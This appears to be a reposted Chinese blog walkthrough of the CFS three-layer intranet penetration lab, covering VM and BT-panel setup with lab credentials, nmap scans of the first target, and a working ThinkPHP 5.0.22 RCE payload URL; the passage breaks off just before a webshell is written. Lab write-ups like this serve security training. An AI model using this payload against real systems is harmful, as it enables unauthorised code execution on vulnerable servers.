首页 > 其他分享 >CFS三层靶机-内网环境渗透

CFS三层靶机-内网环境渗透

时间:2023-02-09 23:13:01浏览次数:39  
标签:shell http 192.168 tcp msf 靶机 内网 CFS 路由

<1>靶场介绍及环境配置

三个主机的网络环境拓扑图,攻击机的网段在192.168.236.0/24,三台靶机的IP地址分别如图:

上面的 Target1、2、3分别对应CentOS7、Ubuntu、Windows7 三台主机。

(1)网卡配置

注意:在编辑虚拟网卡的时候,不要勾选红圈那个选项,否则后面代理就就没有意义了。.ova文件导入到VM之后可以打开虚拟机,使用root:teamssix.com登录主机,通过ifconfig检查网络情况是否正常。

(2)宝塔配置

其中Target1和Target2主机需要我们自己去宝塔后台配置一下(靶机描述信息里有密码 root:teamssix.com):
进入宝塔面板,选择网站,再点击网站名,将centos靶机中c段为236的那个ip添加进去,确保能够访问到对应的web页面

<2>Target1

(1)nmap扫描存活主机

#扫描段内存活主机
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.236.0/24   
Nmap scan report for 192.168.236.141 (192.168.236.141)
Host is up (0.00019s latency).

#nmap扫描一下 Target1 开放的服务
┌──(root㉿kali)-[~]
└─# nmap -A -p 1-65535 192.168.236.141
Nmap scan report for 192.168.236.141 (192.168.236.141)
Host is up (0.00082s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Pure-FTPd
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    nginx
111/tcp  open  rpcbind 2-4 (RPC #100000)
888/tcp  open  http    nginx
3306/tcp open  mysql   MySQL (unauthorized)
8888/tcp open  http    Ajenti http control panel
MAC Address: 00:0C:29:61:BA:F8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

可以看见开放了 21、22、80、111等等端口,我们访问一下80的http服务
访问192.168.236.141 站点不存在,192.168.236.141/index.php 404 是因为宝塔后台配置的原因,按照前面提到的宝塔配置之后就不会出现这个情况。

(2)利用thinkphp-5.0.22 RCE漏洞拿shell

访问80端口开放的http服务

访问后发现这是一个用thinkphp5版本搭建的网站,thinkphp5版本是有漏洞的,这里我们直接上thinkphpGUI工具,检测一下,发现存在ThinkPHP 5.0.22/5.1.29 RCE

poc为:http://192.168.236.141/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

直接GetShell没通,无伤大雅,那我们执行命令去生成一个一句话木

标签:shell,http,192.168,tcp,msf,靶机,内网,CFS,路由
From: https://www.cnblogs.com/1vxyz/p/17080748.html

相关文章

  • 外网电脑远程内网电脑用什么软件,没有外网可以远程控制吗
    远程控制电脑,正常来说都是要通网的。电脑连入互联网,才可以进行远程控制。一台没有任何网络连接的电脑,没法进行远程连接和控制。但是有一种情况比较特殊,就是企业内网环境。有......
  • 内网穿透windows
    无需安装、注册,一行命令搞定内网穿透!关键是完全免费播报文章程序那点事2022-06-0107:59湖南科技领域创作者关注 内网穿透,即NAT穿透,网络连接时术语。......
  • .NET Core SshClient + Npgsql 实现ssh隧道访问内网数据库
    privateconststringSSH_USER="root";//ssh账号privateconststringSSH_PASSWORD=".";//ssh密码,若使用密钥且没密码时填......
  • Vulnhub:Player-v1.1靶机
    kali:192.168.111.111靶机:192.168.111.178信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.178访问80端口发现存在一个目录访问该目录发......
  • Docker+vulhub靶机搭建避坑指南
    Docker+vulhub安装避坑指南1.Docker安装kali需提前换源安装好pipsudoaptinstalldocker.iopipinstalldocker-compose2.搭建vulhub直接使用镜像:gitclonehtt......
  • windows互联网前置配置为时钟源给内网主机同步时钟
    背景:甲方爸爸给了互联网前置机和内网的一堆服务器,只有互联网前置机可以上公网,而内网服务器都无法访问互联网。内网服务器时间不统一。环境:甲方爸爸的服务器都是清一色wi......
  • vulnhub:easy_cloudantivirus靶机
    kali:192.168.111.111靶机:192.168.111.177信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.177访问8080端口在输入框填入双引号发现报错......
  • 红日内网靶场一
    0x00前言这个系列是我打完ay内网靶场以后往后衍生的一个系列,写的过程中会有很多多余的东西是我在尝试的过程,但是我也会记录下来给自己一个提醒积累经验的过程一次两的犯错......
  • Linux内网环境离线安装Git工具
    下载GitLinux下载地址:https://git-scm.com/download/linuxtar.gz包直链:https://www.kernel.org/pub/software/scm/git/git-2.36.1.tar.gz(注意版本号更新)解压tarxvf......
  • vulnhub:Its_October靶机
    kali:192.168.111.111靶机:192.168.111.175信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.1758080端口查看源码提示存在mynote.txt文件......